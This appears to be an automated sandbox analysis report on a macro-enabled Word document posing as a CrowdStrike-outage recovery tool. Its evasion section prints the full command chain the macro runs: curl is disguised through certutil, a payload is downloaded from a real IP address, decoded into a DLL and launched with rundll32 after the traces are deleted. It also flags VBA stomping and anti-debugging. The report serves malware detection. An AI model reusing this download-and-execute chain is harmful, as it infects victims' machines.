File created: C:\Users\user\AppData\Local\Temp\curl.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr	Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: s Hyper-V settings.
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V Settings
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_000000013F4DAFA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		22_2_000000013F35AFA0

HIPS / PFW / Operating System Protection Evasion

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA stomping: true

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit

Language, Device and Operating System Detection

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_000000013F4DBAFC

Source: C:\Windows\System32\certutil.exe

